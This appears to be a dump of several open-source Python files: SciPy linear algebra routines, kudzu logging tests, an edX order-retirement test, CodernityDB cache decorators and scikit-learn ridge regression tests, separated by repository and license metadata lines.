Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
tol : float
The absolute tolerance to which each eigenvalue is required
(only used when 'stebz' is the `lapack_driver`).
An eigenvalue (or cluster) is considered to have converged if it
lies in an interval of this width. If <= 0. (default),
the value ``eps*|a|`` is used where eps is the machine precision,
and ``|a|`` is the 1-norm of the matrix ``a``.
lapack_driver : str
LAPACK function to use, can be 'auto', 'stemr', 'stebz', 'sterf',
or 'stev'. When 'auto' (default), it will use 'stemr' if ``select='a'``
and 'stebz' otherwise. When 'stebz' is used to find the eigenvalues and
``eigvals_only=False``, then a second LAPACK call (to ``?STEIN``) is
used to find the corresponding eigenvectors. 'sterf' can only be
used when ``eigvals_only=True`` and ``select='a'``. 'stev' can only
be used when ``select='a'``.
Returns
-------
w : (M,) ndarray
The eigenvalues, in ascending order, each repeated according to its
multiplicity.
v : (M, M) ndarray
The normalized eigenvector corresponding to the eigenvalue ``w[i]`` is
the column ``v[:,i]``.
Raises
------
LinAlgError
If eigenvalue computation does not converge.
See Also
--------
eigvalsh_tridiagonal : eigenvalues of symmetric/Hermitian tridiagonal
matrices
eig : eigenvalues and right eigenvectors for non-symmetric arrays
eigh : eigenvalues and right eigenvectors for symmetric/Hermitian arrays
eig_banded : eigenvalues and right eigenvectors for symmetric/Hermitian
band matrices
Notes
-----
This function makes use of LAPACK ``S/DSTEMR`` routines.
"""
d = _asarray_validated(d, check_finite=check_finite)
e = _asarray_validated(e, check_finite=check_finite)
for check in (d, e):
if check.ndim != 1:
raise ValueError('expected one-dimensional array')
if check.dtype.char in 'GFD': # complex
raise TypeError('Only real arrays currently supported')
if d.size != e.size + 1:
raise ValueError('d (%s) must have one more element than e (%s)'
% (d.size, e.size))
select, vl, vu, il, iu, _ = _check_select(
select, select_range, 0, d.size)
if not isinstance(lapack_driver, string_types):
raise TypeError('lapack_driver must be str')
drivers = ('auto', 'stemr', 'sterf', 'stebz', 'stev')
if lapack_driver not in drivers:
raise ValueError('lapack_driver must be one of %s, got %s'
% (drivers, lapack_driver))
if lapack_driver == 'auto':
lapack_driver = 'stemr' if select == 0 else 'stebz'
func, = get_lapack_funcs((lapack_driver,), (d, e))
compute_v = not eigvals_only
if lapack_driver == 'sterf':
if select != 0:
raise ValueError('sterf can only be used when select == "a"')
if not eigvals_only:
raise ValueError('sterf can only be used when eigvals_only is '
'True')
w, info = func(d, e)
m = len(w)
elif lapack_driver == 'stev':
if select != 0:
raise ValueError('stev can only be used when select == "a"')
w, v, info = func(d, e, compute_v=compute_v)
m = len(w)
elif lapack_driver == 'stebz':
tol = float(tol)
internal_name = 'stebz'
stebz, = get_lapack_funcs((internal_name,), (d, e))
# If getting eigenvectors, needs to be block-ordered (B) instead of
# matirx-ordered (E), and we will reorder later
order = 'E' if eigvals_only else 'B'
m, w, iblock, isplit, info = stebz(d, e, select, vl, vu, il, iu, tol,
order)
else: # 'stemr'
# ?STEMR annoyingly requires size N instead of N-1
e_ = empty(e.size+1, e.dtype)
e_[:-1] = e
stemr_lwork, = get_lapack_funcs(('stemr_lwork',), (d, e))
lwork, liwork, info = stemr_lwork(d, e_, select, vl, vu, il, iu,
compute_v=compute_v)
_check_info(info, 'stemr_lwork')
m, w, v, info = func(d, e_, select, vl, vu, il, iu,
compute_v=compute_v, lwork=lwork, liwork=liwork)
_check_info(info, lapack_driver + ' (eigh_tridiagonal)')
w = w[:m]
if eigvals_only:
return w
else:
# Do we still need to compute the eigenvalues?
if lapack_driver == 'stebz':
func, = get_lapack_funcs(('stein',), (d, e))
v, info = func(d, e, w, iblock, isplit)
_check_info(info, 'stein (eigh_tridiagonal)',
positive='%d eigenvectors failed to converge')
# Convert block-order to matrix-order
order = argsort(w)
w, v = w[order], v[:, order]
else:
v = v[:, :m]
return w, v
def _check_info(info, driver, positive='did not converge (LAPACK info=%d)'):
"""Check info return value."""
if info < 0:
raise ValueError('illegal value in argument %d of internal %s'
% (-info, driver))
if info > 0 and positive:
raise LinAlgError(("%s " + positive) % (driver, info,))
def hessenberg(a, calc_q=False, overwrite_a=False, check_finite=True):
"""
Compute Hessenberg form of a matrix.
The Hessenberg decomposition is::
A = Q H Q^H
where `Q` is unitary/orthogonal and `H` has only zero elements below
the first sub-diagonal.
Parameters
----------
a : (M, M) array_like
Matrix to bring into Hessenberg form.
calc_q : bool, optional
Whether to compute the transformation matrix. Default is False.
overwrite_a : bool, optional
Whether to overwrite `a`; may improve performance.
Default is False.
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
H : (M, M) ndarray
Hessenberg form of `a`.
Q : (M, M) ndarray
Unitary/orthogonal similarity transformation matrix ``A = Q H Q^H``.
Only returned if ``calc_q=True``.
"""
a1 = _asarray_validated(a, check_finite=check_finite)
if len(a1.shape) != 2 or (a1.shape[0] != a1.shape[1]):
raise ValueError('expected square matrix')
overwrite_a = overwrite_a or (_datacopied(a1, a))
# if 2x2 or smaller: already in Hessenberg
if a1.shape[0] <= 2:
if calc_q:
return a1, numpy.eye(a1.shape[0])
return a1
gehrd, gebal, gehrd_lwork = get_lapack_funcs(('gehrd', 'gebal',
'gehrd_lwork'), (a1,))
ba, lo, hi, pivscale, info = gebal(a1, permute=0, overwrite_a=overwrite_a)
_check_info(info, 'gebal (hessenberg)', positive=False)
n = len(a1)
lwork = _compute_lwork(gehrd_lwork, ba.shape[0], lo=lo, hi=hi)
hq, tau, info = gehrd(ba, lo=lo, hi=hi, lwork=lwork, overwrite_a=1)
_check_info(info, 'gehrd (hessenberg)', positive=False)
h = numpy.triu(hq, -1)
if not calc_q:
return h
# use orghr/unghr to compute q
orghr, orghr_lwork = get_lapack_funcs(('orghr', 'orghr_lwork'), (a1,))
lwork = _compute_lwork(orghr_lwork, n, lo=lo, hi=hi)
q, info = orghr(a=hq, tau=tau, lo=lo, hi=hi, lwork=lwork, overwrite_a=1)
_check_info(info, 'orghr (hessenberg)', positive=False)
return h, q
| mit |
mila/kudzu | tests/test_logging.py | 1 | 2718 |
from __future__ import absolute_import
import logging
from werkzeug.test import EnvironBuilder
from kudzu import RequestContext, kudzify_handler, kudzify_logger
class HandlerMock(logging.Handler):
"""Logging handler which saves all logged messages."""
def __init__(self):
logging.Handler.__init__(self)
self.messages = []
def emit(self, record):
self.messages.append(self.format(record))
class TestRequestContextFilter(object):
format = '["%(method)s %(proto)s %(uri)s" from %(addr)s] %(message)s'
def setup_method(self, method):
self.handler = HandlerMock()
self.logger = logging.getLogger('test_logging')
self.logger.addHandler(self.handler)
self.logger.level = logging.DEBUG
def teardown_method(self, method):
self.logger.removeHandler(self.handler)
def test_kudzify_handler(self):
kudzify_handler(self.handler, format=self.format)
builder = EnvironBuilder()
with RequestContext(builder.get_environ()):
self.logger.info('Hello %s', 'Kudzu')
assert len(self.handler.messages) == 1
assert self.handler.messages[0] == \
'["GET HTTP/1.1 /" from -] Hello Kudzu'
def test_kudzify_logger(self):
kudzify_logger(self.logger, format=self.format)
builder = EnvironBuilder()
with RequestContext(builder.get_environ()):
self.logger.info('Hello %s', 'Kudzu')
assert len(self.handler.messages) == 1
assert self.handler.messages[0] == \
'["GET HTTP/1.1 /" from -] Hello Kudzu'
def test_kudzify_logger_by_name(self):
kudzify_logger(self.logger.name, format=self.format)
builder = EnvironBuilder()
with RequestContext(builder.get_environ()):
self.logger.info('Hello %s', 'Kudzu')
assert len(self.handler.messages) == 1
assert self.handler.messages[0] == \
'["GET HTTP/1.1 /" from -] Hello Kudzu'
def test_log_wo_context(self):
kudzify_logger(self.logger, format=self.format)
self.logger.info('Hello %s', 'Kudzu')
assert len(self.handler.messages) == 1
assert self.handler.messages[0] == '["- - -" from -] Hello Kudzu'
def test_log_w_context(self):
kudzify_logger(self.logger, format=self.format)
builder = EnvironBuilder(path='/foo',
environ_base={'REMOTE_ADDR': '127.0.0.1'})
with RequestContext(builder.get_environ()):
self.logger.info('Hello %s', 'Kudzu')
assert len(self.handler.messages) == 1
assert self.handler.messages[0] == \
'["GET HTTP/1.1 /foo" from 127.0.0.1] Hello Kudzu'
| bsd-3-clause |
waheedahmed/edx-platform | lms/djangoapps/shoppingcart/management/tests/test_retire_order.py | 60 | 2852 | """Tests for the retire_order command"""
from tempfile import NamedTemporaryFile
from django.core.management import call_command
from course_modes.models import CourseMode
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from shoppingcart.models import Order, CertificateItem
from student.tests.factories import UserFactory
class TestRetireOrder(ModuleStoreTestCase):
"""Test the retire_order command"""
def setUp(self):
super(TestRetireOrder, self).setUp()
course = CourseFactory.create()
self.course_key = course.id
CourseMode.objects.create(
course_id=self.course_key,
mode_slug=CourseMode.HONOR,
mode_display_name=CourseMode.HONOR
)
# set up test carts
self.cart, __ = self._create_cart()
self.paying, __ = self._create_cart()
self.paying.start_purchase()
self.already_defunct_cart, __ = self._create_cart()
self.already_defunct_cart.retire()
self.purchased, self.purchased_item = self._create_cart()
self.purchased.status = "purchased"
self.purchased.save()
self.purchased_item.status = "purchased"
self.purchased.save()
def test_retire_order(self):
"""Test the retire_order command"""
nonexistent_id = max(order.id for order in Order.objects.all()) + 1
order_ids = [
self.cart.id,
self.paying.id,
self.already_defunct_cart.id,
self.purchased.id,
nonexistent_id
]
self._create_tempfile_and_call_command(order_ids)
self.assertEqual(
Order.objects.get(id=self.cart.id).status, "defunct-cart"
)
self.assertEqual(
Order.objects.get(id=self.paying.id).status, "defunct-paying"
)
self.assertEqual(
Order.objects.get(id=self.already_defunct_cart.id).status,
"defunct-cart"
)
self.assertEqual(
Order.objects.get(id=self.purchased.id).status, "purchased"
)
def _create_tempfile_and_call_command(self, order_ids):
"""
Takes a list of order_ids, writes them to a tempfile, and then runs the
"retire_order" command on the tempfile
"""
with NamedTemporaryFile() as temp:
temp.write("\n".join(str(order_id) for order_id in order_ids))
temp.seek(0)
call_command('retire_order', temp.name)
def _create_cart(self):
"""Creates a cart and adds a CertificateItem to it"""
cart = Order.get_cart_for_user(UserFactory.create())
item = CertificateItem.add_to_order(
cart, self.course_key, 10, 'honor', currency='usd'
)
return cart, item
| agpl-3.0 |
fldc/CouchPotatoServer | libs/CodernityDB/lfu_cache_with_lock.py | 82 | 5486 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2011-2013 Codernity (http://codernity.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
from heapq import nsmallest
from operator import itemgetter
from collections import defaultdict
try:
from collections import Counter
except ImportError:
class Counter(dict):
'Mapping where default values are zero'
def __missing__(self, key):
return 0
def twolvl_iterator(dict):
for k, v in dict.iteritems():
for kk, vv in v.iteritems():
yield k, kk, vv
def create_cache1lvl(lock_obj):
def cache1lvl(maxsize=100):
"""
modified version of http://code.activestate.com/recipes/498245/
"""
def decorating_function(user_function):
cache = {}
use_count = Counter()
lock = lock_obj()
@functools.wraps(user_function)
def wrapper(key, *args, **kwargs):
try:
result = cache[key]
except KeyError:
with lock:
if len(cache) == maxsize:
for k, _ in nsmallest(maxsize // 10 or 1,
use_count.iteritems(),
key=itemgetter(1)):
del cache[k], use_count[k]
cache[key] = user_function(key, *args, **kwargs)
result = cache[key]
use_count[key] += 1
else:
with lock:
use_count[key] += 1
return result
def clear():
cache.clear()
use_count.clear()
def delete(key):
try:
del cache[key]
del use_count[key]
return True
except KeyError:
return False
wrapper.clear = clear
wrapper.cache = cache
wrapper.delete = delete
return wrapper
return decorating_function
return cache1lvl
def create_cache2lvl(lock_obj):
def cache2lvl(maxsize=100):
"""
modified version of http://code.activestate.com/recipes/498245/
"""
def decorating_function(user_function):
cache = {}
use_count = defaultdict(Counter)
lock = lock_obj()
@functools.wraps(user_function)
def wrapper(*args, **kwargs):
try:
result = cache[args[0]][args[1]]
except KeyError:
with lock:
if wrapper.cache_size == maxsize:
to_delete = maxsize / 10 or 1
for k1, k2, v in nsmallest(to_delete,
twolvl_iterator(
use_count),
key=itemgetter(2)):
del cache[k1][k2], use_count[k1][k2]
if not cache[k1]:
del cache[k1]
del use_count[k1]
wrapper.cache_size -= to_delete
result = user_function(*args, **kwargs)
try:
cache[args[0]][args[1]] = result
except KeyError:
cache[args[0]] = {args[1]: result}
use_count[args[0]][args[1]] += 1
wrapper.cache_size += 1
else:
use_count[args[0]][args[1]] += 1
return result
def clear():
cache.clear()
use_count.clear()
def delete(key, *args):
if args:
try:
del cache[key][args[0]]
del use_count[key][args[0]]
if not cache[key]:
del cache[key]
del use_count[key]
wrapper.cache_size -= 1
return True
except KeyError:
return False
else:
try:
wrapper.cache_size -= len(cache[key])
del cache[key]
del use_count[key]
return True
except KeyError:
return False
wrapper.clear = clear
wrapper.cache = cache
wrapper.delete = delete
wrapper.cache_size = 0
return wrapper
return decorating_function
return cache2lvl
| gpl-3.0 |
fabianp/scikit-learn | sklearn/linear_model/tests/test_ridge.py | 130 | 22974 | import numpy as np
import scipy.sparse as sp
from scipy import linalg
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import ignore_warnings
from sklearn import datasets
from sklearn.metrics import mean_squared_error
from sklearn.metrics import make_scorer
from sklearn.metrics import get_scorer
from sklearn.linear_model.base import LinearRegression
from sklearn.linear_model.ridge import ridge_regression
from sklearn.linear_model.ridge import Ridge
from sklearn.linear_model.ridge import _RidgeGCV
from sklearn.linear_model.ridge import RidgeCV
from sklearn.linear_model.ridge import RidgeClassifier
from sklearn.linear_model.ridge import RidgeClassifierCV
from sklearn.linear_model.ridge import _solve_cholesky
from sklearn.linear_model.ridge import _solve_cholesky_kernel
from sklearn.grid_search import GridSearchCV
from sklearn.cross_validation import KFold
diabetes = datasets.load_diabetes()
X_diabetes, y_diabetes = diabetes.data, diabetes.target
ind = np.arange(X_diabetes.shape[0])
rng = np.random.RandomState(0)
rng.shuffle(ind)
ind = ind[:200]
X_diabetes, y_diabetes = X_diabetes[ind], y_diabetes[ind]
iris = datasets.load_iris()
X_iris = sp.csr_matrix(iris.data)
y_iris = iris.target
DENSE_FILTER = lambda X: X
SPARSE_FILTER = lambda X: sp.csr_matrix(X)
def test_ridge():
# Ridge regression convergence test using score
# TODO: for this test to be robust, we should use a dataset instead
# of np.random.
rng = np.random.RandomState(0)
alpha = 1.0
for solver in ("svd", "sparse_cg", "cholesky", "lsqr"):
# With more samples than features
n_samples, n_features = 6, 5
y = rng.randn(n_samples)
X = rng.randn(n_samples, n_features)
ridge = Ridge(alpha=alpha, solver=solver)
ridge.fit(X, y)
assert_equal(ridge.coef_.shape, (X.shape[1], ))
assert_greater(ridge.score(X, y), 0.47)
if solver == "cholesky":
# Currently the only solver to support sample_weight.
ridge.fit(X, y, sample_weight=np.ones(n_samples))
assert_greater(ridge.score(X, y), 0.47)
# With more features than samples
n_samples, n_features = 5, 10
y = rng.randn(n_samples)
X = rng.randn(n_samples, n_features)
ridge = Ridge(alpha=alpha, solver=solver)
ridge.fit(X, y)
assert_greater(ridge.score(X, y), .9)
if solver == "cholesky":
# Currently the only solver to support sample_weight.
ridge.fit(X, y, sample_weight=np.ones(n_samples))
assert_greater(ridge.score(X, y), 0.9)
def test_primal_dual_relationship():
y = y_diabetes.reshape(-1, 1)
coef = _solve_cholesky(X_diabetes, y, alpha=[1e-2])
K = np.dot(X_diabetes, X_diabetes.T)
dual_coef = _solve_cholesky_kernel(K, y, alpha=[1e-2])
coef2 = np.dot(X_diabetes.T, dual_coef).T
assert_array_almost_equal(coef, coef2)
def test_ridge_singular():
# test on a singular matrix
rng = np.random.RandomState(0)
n_samples, n_features = 6, 6
y = rng.randn(n_samples // 2)
y = np.concatenate((y, y))
X = rng.randn(n_samples // 2, n_features)
X = np.concatenate((X, X), axis=0)
ridge = Ridge(alpha=0)
ridge.fit(X, y)
assert_greater(ridge.score(X, y), 0.9)
def test_ridge_sample_weights():
rng = np.random.RandomState(0)
for solver in ("cholesky", ):
for n_samples, n_features in ((6, 5), (5, 10)):
for alpha in (1.0, 1e-2):
y = rng.randn(n_samples)
X = rng.randn(n_samples, n_features)
sample_weight = 1 + rng.rand(n_samples)
coefs = ridge_regression(X, y,
alpha=alpha,
sample_weight=sample_weight,
solver=solver)
# Sample weight can be implemented via a simple rescaling
# for the square loss.
coefs2 = ridge_regression(
X * np.sqrt(sample_weight)[:, np.newaxis],
y * np.sqrt(sample_weight),
alpha=alpha, solver=solver)
assert_array_almost_equal(coefs, coefs2)
# Test for fit_intercept = True
est = Ridge(alpha=alpha, solver=solver)
est.fit(X, y, sample_weight=sample_weight)
# Check using Newton's Method
# Quadratic function should be solved in a single step.
# Initialize
sample_weight = np.sqrt(sample_weight)
X_weighted = sample_weight[:, np.newaxis] * (
np.column_stack((np.ones(n_samples), X)))
y_weighted = y * sample_weight
# Gradient is (X*coef-y)*X + alpha*coef_[1:]
# Remove coef since it is initialized to zero.
grad = -np.dot(y_weighted, X_weighted)
# Hessian is (X.T*X) + alpha*I except that the first
# diagonal element should be zero, since there is no
# penalization of intercept.
diag = alpha * np.ones(n_features + 1)
diag[0] = 0.
hess = np.dot(X_weighted.T, X_weighted)
hess.flat[::n_features + 2] += diag
coef_ = - np.dot(linalg.inv(hess), grad)
assert_almost_equal(coef_[0], est.intercept_)
assert_array_almost_equal(coef_[1:], est.coef_)
def test_ridge_shapes():
# Test shape of coef_ and intercept_
rng = np.random.RandomState(0)
n_samples, n_features = 5, 10
X = rng.randn(n_samples, n_features)
y = rng.randn(n_samples)
Y1 = y[:, np.newaxis]
Y = np.c_[y, 1 + y]
ridge = Ridge()
ridge.fit(X, y)
assert_equal(ridge.coef_.shape, (n_features,))
assert_equal(ridge.intercept_.shape, ())
ridge.fit(X, Y1)
assert_equal(ridge.coef_.shape, (1, n_features))
assert_equal(ridge.intercept_.shape, (1, ))
ridge.fit(X, Y)
assert_equal(ridge.coef_.shape, (2, n_features))
assert_equal(ridge.intercept_.shape, (2, ))
def test_ridge_intercept():
# Test intercept with multiple targets GH issue #708
rng = np.random.RandomState(0)
n_samples, n_features = 5, 10
X = rng.randn(n_samples, n_features)
y = rng.randn(n_samples)
Y = np.c_[y, 1. + y]
ridge = Ridge()
ridge.fit(X, y)
intercept = ridge.intercept_
ridge.fit(X, Y)
assert_almost_equal(ridge.intercept_[0], intercept)
assert_almost_equal(ridge.intercept_[1], intercept + 1.)
def test_toy_ridge_object():
# Test BayesianRegression ridge classifier
# TODO: test also n_samples > n_features
X = np.array([[1], [2]])
Y = np.array([1, 2])
clf = Ridge(alpha=0.0)
clf.fit(X, Y)
X_test = [[1], [2], [3], [4]]
assert_almost_equal(clf.predict(X_test), [1., 2, 3, 4])
assert_equal(len(clf.coef_.shape), 1)
assert_equal(type(clf.intercept_), np.float64)
Y = np.vstack((Y, Y)).T
clf.fit(X, Y)
X_test = [[1], [2], [3], [4]]
assert_equal(len(clf.coef_.shape), 2)
assert_equal(type(clf.intercept_), np.ndarray)
def test_ridge_vs_lstsq():
# On alpha=0., Ridge and OLS yield the same solution.
rng = np.random.RandomState(0)
# we need more samples than features
n_samples, n_features = 5, 4
y = rng.randn(n_samples)
X = rng.randn(n_samples, n_features)
ridge = Ridge(alpha=0., fit_intercept=False)
ols = LinearRegression(fit_intercept=False)
ridge.fit(X, y)
ols.fit(X, y)
assert_almost_equal(ridge.coef_, ols.coef_)
ridge.fit(X, y)
ols.fit(X, y)
assert_almost_equal(ridge.coef_, ols.coef_)
def test_ridge_individual_penalties():
# Tests the ridge object using individual penalties
rng = np.random.RandomState(42)
n_samples, n_features, n_targets = 20, 10, 5
X = rng.randn(n_samples, n_features)
y = rng.randn(n_samples, n_targets)
penalties = np.arange(n_targets)
coef_cholesky = np.array([
Ridge(alpha=alpha, solver="cholesky").fit(X, target).coef_
for alpha, target in zip(penalties, y.T)])
coefs_indiv_pen = [
Ridge(alpha=penalties, solver=solver, tol=1e-6).fit(X, y).coef_
for solver in ['svd', 'sparse_cg', 'lsqr', 'cholesky']]
for coef_indiv_pen in coefs_indiv_pen:
assert_array_almost_equal(coef_cholesky, coef_indiv_pen)
# Test error is raised when number of targets and penalties do not match.
ridge = Ridge(alpha=penalties[:3])
assert_raises(ValueError, ridge.fit, X, y)
def _test_ridge_loo(filter_):
# test that can work with both dense or sparse matrices
n_samples = X_diabetes.shape[0]
ret = []
ridge_gcv = _RidgeGCV(fit_intercept=False)
ridge = Ridge(alpha=1.0, fit_intercept=False)
# generalized cross-validation (efficient leave-one-out)
decomp = ridge_gcv._pre_compute(X_diabetes, y_diabetes)
errors, c = ridge_gcv._errors(1.0, y_diabetes, *decomp)
values, c = ridge_gcv._values(1.0, y_diabetes, *decomp)
# brute-force leave-one-out: remove one example at a time
errors2 = []
values2 = []
for i in range(n_samples):
sel = np.arange(n_samples) != i
X_new = X_diabetes[sel]
y_new = y_diabetes[sel]
ridge.fit(X_new, y_new)
value = ridge.predict([X_diabetes[i]])[0]
error = (y_diabetes[i] - value) ** 2
errors2.append(error)
values2.append(value)
# check that efficient and brute-force LOO give same results
assert_almost_equal(errors, errors2)
assert_almost_equal(values, values2)
# generalized cross-validation (efficient leave-one-out,
# SVD variation)
decomp = ridge_gcv._pre_compute_svd(X_diabetes, y_diabetes)
errors3, c = ridge_gcv._errors_svd(ridge.alpha, y_diabetes, *decomp)
values3, c = ridge_gcv._values_svd(ridge.alpha, y_diabetes, *decomp)
# check that efficient and SVD efficient LOO give same results
assert_almost_equal(errors, errors3)
assert_almost_equal(values, values3)
# check best alpha
ridge_gcv.fit(filter_(X_diabetes), y_diabetes)
alpha_ = ridge_gcv.alpha_
ret.append(alpha_)
# check that we get same best alpha with custom loss_func
f = ignore_warnings
scoring = make_scorer(mean_squared_error, greater_is_better=False)
ridge_gcv2 = RidgeCV(fit_intercept=False, scoring=scoring)
f(ridge_gcv2.fit)(filter_(X_diabetes), y_diabetes)
assert_equal(ridge_gcv2.alpha_, alpha_)
# check that we get same best alpha with custom score_func
func = lambda x, y: -mean_squared_error(x, y)
scoring = make_scorer(func)
ridge_gcv3 = RidgeCV(fit_intercept=False, scoring=scoring)
f(ridge_gcv3.fit)(filter_(X_diabetes), y_diabetes)
assert_equal(ridge_gcv3.alpha_, alpha_)
# check that we get same best alpha with a scorer
scorer = get_scorer('mean_squared_error')
ridge_gcv4 = RidgeCV(fit_intercept=False, scoring=scorer)
ridge_gcv4.fit(filter_(X_diabetes), y_diabetes)
assert_equal(ridge_gcv4.alpha_, alpha_)
# check that we get same best alpha with sample weights
ridge_gcv.fit(filter_(X_diabetes), y_diabetes,
sample_weight=np.ones(n_samples))
assert_equal(ridge_gcv.alpha_, alpha_)
# simulate several responses
Y = np.vstack((y_diabetes, y_diabetes)).T
ridge_gcv.fit(filter_(X_diabetes), Y)
Y_pred = ridge_gcv.predict(filter_(X_diabetes))
ridge_gcv.fit(filter_(X_diabetes), y_diabetes)
y_pred = ridge_gcv.predict(filter_(X_diabetes))
assert_array_almost_equal(np.vstack((y_pred, y_pred)).T,
Y_pred, decimal=5)
return ret
def _test_ridge_cv(filter_):
n_samples = X_diabetes.shape[0]
ridge_cv = RidgeCV()
ridge_cv.fit(filter_(X_diabetes), y_diabetes)
ridge_cv.predict(filter_(X_diabetes))
assert_equal(len(ridge_cv.coef_.shape), 1)
assert_equal(type(ridge_cv.intercept_), np.float64)
cv = KFold(n_samples, 5)
ridge_cv.set_params(cv=cv)
ridge_cv.fit(filter_(X_diabetes), y_diabetes)
ridge_cv.predict(filter_(X_diabetes))
assert_equal(len(ridge_cv.coef_.shape), 1)
assert_equal(type(ridge_cv.intercept_), np.float64)
def _test_ridge_diabetes(filter_):
ridge = Ridge(fit_intercept=False)
ridge.fit(filter_(X_diabetes), y_diabetes)
return np.round(ridge.score(filter_(X_diabetes), y_diabetes), 5)
def _test_multi_ridge_diabetes(filter_):
# simulate several responses
Y = np.vstack((y_diabetes, y_diabetes)).T
n_features = X_diabetes.shape[1]
ridge = Ridge(fit_intercept=False)
ridge.fit(filter_(X_diabetes), Y)
assert_equal(ridge.coef_.shape, (2, n_features))
Y_pred = ridge.predict(filter_(X_diabetes))
ridge.fit(filter_(X_diabetes), y_diabetes)
y_pred = ridge.predict(filter_(X_diabetes))
assert_array_almost_equal(np.vstack((y_pred, y_pred)).T,
Y_pred, decimal=3)
def _test_ridge_classifiers(filter_):
n_classes = np.unique(y_iris).shape[0]
n_features = X_iris.shape[1]
for clf in (RidgeClassifier(), RidgeClassifierCV()):
clf.fit(filter_(X_iris), y_iris)
assert_equal(clf.coef_.shape, (n_classes, n_features))
y_pred = clf.predict(filter_(X_iris))
assert_greater(np.mean(y_iris == y_pred), .79)
n_samples = X_iris.shape[0]
cv = KFold(n_samples, 5)
clf = RidgeClassifierCV(cv=cv)
clf.fit(filter_(X_iris), y_iris)
y_pred = clf.predict(filter_(X_iris))
assert_true(np.mean(y_iris == y_pred) >= 0.8)
def _test_tolerance(filter_):
ridge = Ridge(tol=1e-5)
ridge.fit(filter_(X_diabetes), y_diabetes)
score = ridge.score(filter_(X_diabetes), y_diabetes)
ridge2 = Ridge(tol=1e-3)
ridge2.fit(filter_(X_diabetes), y_diabetes)
score2 = ridge2.score(filter_(X_diabetes), y_diabetes)
assert_true(score >= score2)
def test_dense_sparse():
for test_func in (_test_ridge_loo,
_test_ridge_cv,
_test_ridge_diabetes,
_test_multi_ridge_diabetes,
_test_ridge_classifiers,
_test_tolerance):
# test dense matrix
ret_dense = test_func(DENSE_FILTER)
# test sparse matrix
ret_sparse = test_func(SPARSE_FILTER)
# test that the outputs are the same
if ret_dense is not None and ret_sparse is not None:
assert_array_almost_equal(ret_dense, ret_sparse, decimal=3)
def test_ridge_cv_sparse_svd():
X = sp.csr_matrix(X_diabetes)
ridge = RidgeCV(gcv_mode="svd")
assert_raises(TypeError, ridge.fit, X)
def test_ridge_sparse_svd():
X = sp.csc_matrix(rng.rand(100, 10))
y = rng.rand(100)
ridge = Ridge(solver='svd')
assert_raises(TypeError, ridge.fit, X, y)
def test_class_weights():
# Test class weights.
X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0],
[1.0, 1.0], [1.0, 0.0]])
y = [1, 1, 1, -1, -1]
clf = RidgeClassifier(class_weight=None)
clf.fit(X, y)
assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([1]))
# we give a small weights to class 1
clf = RidgeClassifier(class_weight={1: 0.001})
clf.fit(X, y)
# now the hyperplane should rotate clock-wise and
# the prediction on this point should shift
assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([-1]))
# check if class_weight = 'balanced' can handle negative labels.
clf = RidgeClassifier(class_weight='balanced')
clf.fit(X, y)
assert_array_equal(clf.predict([[0.2, -1.0]]), np.array([1]))
# class_weight = 'balanced', and class_weight = None should return
# same values when y has equal number of all labels
X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0], [1.0, 1.0]])
y = [1, 1, -1, -1]
clf = RidgeClassifier(class_weight=None)
clf.fit(X, y)
clfa = RidgeClassifier(class_weight='balanced')
clfa.fit(X, y)
assert_equal(len(clfa.classes_), 2)
assert_array_almost_equal(clf.coef_, clfa.coef_)
assert_array_almost_equal(clf.intercept_, clfa.intercept_)
def test_class_weight_vs_sample_weight():
"""Check class_weights resemble sample_weights behavior."""
for clf in (RidgeClassifier, RidgeClassifierCV):
# Iris is balanced, so no effect expected for using 'balanced' weights
clf1 = clf()
clf1.fit(iris.data, iris.target)
clf2 = clf(class_weight='balanced')
clf2.fit(iris.data, iris.target)
assert_almost_equal(clf1.coef_, clf2.coef_)
# Inflate importance of class 1, check against user-defined weights
sample_weight = np.ones(iris.target.shape)
sample_weight[iris.target == 1] *= 100
class_weight = {0: 1., 1: 100., 2: 1.}
clf1 = clf()
clf1.fit(iris.data, iris.target, sample_weight)
clf2 = clf(class_weight=class_weight)
clf2.fit(iris.data, iris.target)
assert_almost_equal(clf1.coef_, clf2.coef_)
# Check that sample_weight and class_weight are multiplicative
clf1 = clf()
clf1.fit(iris.data, iris.target, sample_weight ** 2)
clf2 = clf(class_weight=class_weight)
clf2.fit(iris.data, iris.target, sample_weight)
assert_almost_equal(clf1.coef_, clf2.coef_)
def test_class_weights_cv():
# Test class weights for cross validated ridge classifier.
X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0],
[1.0, 1.0], [1.0, 0.0]])
y = [1, 1, 1, -1, -1]
clf = RidgeClassifierCV(class_weight=None, alphas=[.01, .1, 1])
clf.fit(X, y)
# we give a small weights to class 1
clf = RidgeClassifierCV(class_weight={1: 0.001}, alphas=[.01, .1, 1, 10])
clf.fit(X, y)
assert_array_equal(clf.predict([[-.2, 2]]), np.array([-1]))
def test_ridgecv_store_cv_values():
# Test _RidgeCV's store_cv_values attribute.
rng = rng = np.random.RandomState(42)
n_samples = 8
n_features = 5
x = rng.randn(n_samples, n_features)
alphas = [1e-1, 1e0, 1e1]
n_alphas = len(alphas)
r = RidgeCV(alphas=alphas, store_cv_values=True)
# with len(y.shape) == 1
y = rng.randn(n_samples)
r.fit(x, y)
assert_equal(r.cv_values_.shape, (n_samples, n_alphas))
